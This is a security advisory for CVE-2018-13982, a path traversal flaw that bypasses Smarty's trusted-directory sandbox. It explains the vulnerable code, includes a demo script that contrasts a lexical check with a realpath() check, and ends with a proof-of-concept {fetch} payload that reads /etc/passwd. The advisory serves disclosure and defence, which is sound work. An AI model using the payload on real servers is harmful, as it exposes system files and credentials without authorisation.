Trusted-Directory Bypass via Path Traversal

Published: 2018-04-26 19:38:08 (listed under OpenJS Foundation, source github.com; FriendsOfPHP security-advisory entry FRIENDSOFPHP:SMARTY)
EPSS: 0.003 (percentile 69.8%)
Smarty Trusted-Directory Bypass via Path Traversal

Vulnerability Overview

Smarty 3.1.32 or below is prone to a path traversal vulnerability due to
insufficient sanitization of file paths referenced from Smarty templates.
This allows attackers who control a Smarty template to bypass the
trusted-directory security restriction and read arbitrary files.

Identifier            : SBA-ADV-20180420-01
Type of Vulnerability : Path Traversal
Software/Product Name : Smarty
Vendor                : Smarty
Affected Versions     : 3.1.32 and probably prior
Fixed in Version      : 3.1.33
CVE ID                : CVE-2018-13982
CVSSv3 Vector         : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVSSv3 Base Score     : 8.6 (High)

Vendor Description

Smarty is a template engine for PHP, facilitating the separation of
presentation (HTML/CSS) from application logic. This implies that PHP
code is application logic, and is separated from the presentation.

Source: https://www.smarty.net/about_smarty

Impact

An attacker controlling the executed template code can read arbitrary
files readable by the webserver process by exploiting the vulnerability
documented in this advisory. Sensitive data such as database credentials
might get exposed through this attack. The precondition is that an
untrusted party can author template content and the application relies
on Smarty's security sandbox (enableSecurity) to confine it; the sandbox
is the control that this vulnerability bypasses.

We recommend upgrading to version 3.1.33 or newer.

Vulnerability Description

Smarty allows restricting which paths are accessible during template
evaluation. This feature is implemented in the Smarty_Security class and
is enabled via the method enableSecurity. However, the trusted directory
check implemented in the method isTrustedResourceDir of the
Smarty_Security class is vulnerable to path traversal.

The method isTrustedResourceDir first builds the list of allowed
directories (kept in $this->_resource_dir) and then relies on the
_checkDir method to check whether the directory of the requested
$filepath is trusted.
In version 3.1.31 neither isTrustedResourceDir nor _checkDir prevents
path traversal: _checkDir takes dirname($filepath) and walks upwards one
component at a time until it hits a trusted directory, and a ".." segment
is stripped like any other component instead of being resolved:

    public function isTrustedResourceDir($filepath, $isConfig = null)
    {
        [...]
        $this->_resource_dir = $this->_checkDir($filepath, $this->_resource_dir);
        return true;
    }

    private function _checkDir($filepath, $dirs)
    {
        $directory = dirname($filepath) . DIRECTORY_SEPARATOR;
        $_directory = array();
        while (true) {
            // remember the directory to add it to _resource_dir in case we're successful
            $_directory[ $directory ] = true;
            // test if the directory is trusted
            if (isset($dirs[ $directory ])) {
                // merge sub directories of current $directory into _resource_dir to speed up subsequent lookup
                $dirs = array_merge($dirs, $_directory);
                return $dirs;
            }
            // abort if we've reached root
            if (!preg_match('#[\\\\/][^\\\\/]+[\\\\/]$#', $directory)) {
                break;
            }
            // bubble up one level
            $directory = preg_replace('#[\\\\/][^\\\\/]+[\\\\/]$#', DIRECTORY_SEPARATOR, $directory);
        }
        // give up
        throw new SmartyException("directory '{$filepath}' not allowed by security setting");
    }

In version 3.1.32 _checkDir calls _realpath before checking whether the
requested resource is trusted.
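To make the 3.1.31 behaviour concrete, the following stand-alone script re-implements the parent-directory walk of _checkDir shown above next to a realpath()-based check, and runs both against a temporary fixture. This is an added example written for this page; it is not Smarty's code and not part of the advisory. The function names lexicalIsTrusted and realpathIsTrusted, the throw-away directory under sys_get_temp_dir() and the file contents are all constructed for the demonstration; the realpath() variant is an alternative an application can apply to paths it hands to {fetch}, not the approach Smarty's own patches took (those corrected Smarty's lexical _realpath, see the patch commits below).

```php
<?php
// Added example (not Smarty's code and not part of the advisory). It re-implements,
// stand-alone, the parent-directory walk of Smarty 3.1.31's
// Smarty_Security::_checkDir() and contrasts it with a realpath()-based check.
// Function names, the temporary fixture and the file contents are constructed
// for this demonstration.

/**
 * Lexical walk as in 3.1.31: start at dirname($filepath) and strip one trailing
 * component per iteration until a trusted directory key matches or the root is
 * reached. ".." is treated like any other component, so
 * "/trusted/../../etc/passwd" passes through "/trusted/../../", "/trusted/../"
 * and finally "/trusted/", which is trusted.
 * Smarty throws SmartyException on failure; this variant returns false.
 */
function lexicalIsTrusted(string $filepath, array $trustedDirs): bool
{
    $directory = dirname($filepath) . DIRECTORY_SEPARATOR;
    while (true) {
        if (isset($trustedDirs[$directory])) {
            return true;
        }
        // no "/component/" left at the end means we reached the root
        if (!preg_match('#[\\\\/][^\\\\/]+[\\\\/]$#', $directory)) {
            return false;
        }
        // bubble up one level: "/a/b/" becomes "/a/"
        $directory = preg_replace('#[\\\\/][^\\\\/]+[\\\\/]$#', DIRECTORY_SEPARATOR, $directory);
    }
}

/**
 * Filesystem-backed check: resolve the requested file and every trusted
 * directory with realpath(), which collapses "." and ".." and follows
 * symlinks, then require the resolved file to lie below a resolved trusted
 * directory. A non-existent file resolves to false and is denied, which is
 * the right answer for a read such as {fetch}.
 */
function realpathIsTrusted(string $filepath, array $trustedDirs): bool
{
    $real = realpath($filepath);
    if ($real === false) {
        return false;
    }
    foreach (array_keys($trustedDirs) as $dir) {
        $realDir = realpath($dir);
        if ($realDir === false) {
            continue;
        }
        // keep the trailing separator so "/srv/templates2/x" does not match "/srv/templates"
        $prefix = rtrim($realDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($real, $prefix, strlen($prefix)) === 0) {
            return true;
        }
    }
    return false;
}

// Constructed fixture: a throw-away template directory plus a file outside it.
$ds        = DIRECTORY_SEPARATOR;
$base      = sys_get_temp_dir() . $ds . 'smarty-traversal-' . bin2hex(random_bytes(4));
$templates = $base . $ds . 'templates';
mkdir($templates, 0700, true);
file_put_contents($templates . $ds . 'index.tpl', "hello\n");
file_put_contents($base . $ds . 'secret.txt', "db_password=example\n");

// Trusted directories are keyed with a trailing separator, as in _resource_dir.
$trusted = array($templates . $ds => true);

$inside    = $templates . $ds . 'index.tpl';
$traversal = $templates . $ds . '..' . $ds . 'secret.txt';

foreach (array('lexicalIsTrusted', 'realpathIsTrusted') as $check) {
    printf("%-17s inside=%s traversal=%s\n", $check,
        var_export($check($inside, $trusted), true),
        var_export($check($traversal, $trusted), true));
}

// clean up the fixture
unlink($templates . $ds . 'index.tpl');
unlink($base . $ds . 'secret.txt');
rmdir($templates);
rmdir($base);
```

With this fixture lexicalIsTrusted accepts both paths, because the walk from "templates/../" reaches the trusted "templates/" key after one step, while realpathIsTrusted accepts only index.tpl: the traversal path resolves to secret.txt, which does not start with the resolved templates prefix. The trailing-separator prefix comparison matters on its own; without it a sibling directory whose name merely begins with the trusted one would pass.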
The custom _realpath implementation in 3.1.32 is, however, broken and
still allows path traversal at least on Unix systems.

For example, the fetch tag uses the isTrustedResourceDir method to
check whether a user-specified path may be read.

Proof-of-Concept

An attacker can exploit this vulnerability by using the fetch tag:

    {fetch file="/var/www/templates/../../../../../etc/passwd"}

Full example:

    <?php
    // bootstrap: the Smarty include path below is an assumption, adjust it
    // to your installation
    require_once 'libs/Smarty.class.php';
    $smarty = new Smarty();
    $smarty->enableSecurity();
    // Fails
    //$smarty->display('eval:{fetch file="/etc/passwd"}');
    // Works
    $smarty->display('eval:{fetch file="' . addslashes(getcwd()) . '/templates/../../../../../etc/passwd"}');

The direct /etc/passwd path is rejected because no trusted directory is
an ancestor of it. Prefixing the default template directory (templates/
below the working directory) makes the upward walk in _checkDir land on
the trusted directory before the ".." segments are ever resolved, so the
read is allowed.

Timeline

2018-04-20: identification of vulnerability in version 3.1.31
2018-04-23: initial vendor contact
2018-04-23: disclosed vulnerability to vendor
2018-04-24: vendor acknowledged vulnerability and released version 3.1.32
2018-04-25: notified vendor about incomplete fix
2018-04-26: vendor fixed vulnerability
2018-07-10: requested CVE from MITRE
2018-07-11: MITRE assigned CVE-2018-13982
2018-09-12: vendor released fix in version 3.1.33
2018-09-17: public disclosure

References

Changelog: https://github.com/smarty-php/smarty/commit/bcedfd6b58bed4a7366336979ebaa5a240581531

Patches:
https://github.com/smarty-php/smarty/commit/8d21f38dc35c4cd6b31c2f23fc9b8e5adbc56dfe
https://github.com/smarty-php/smarty/commit/f9ca3c63d1250bb56b2bda609dcc9dd81f0065f8
https://github.com/smarty-php/smarty/commit/2e081a51b1effddb23f87952959139ac62654d50
https://github.com/smarty-php/smarty/commit/c9dbe1d08c081912d02bd851d1d1b6388f6133d1

Credits

David Gnedt (SBA Research)
Thomas Konrad (SBA Research)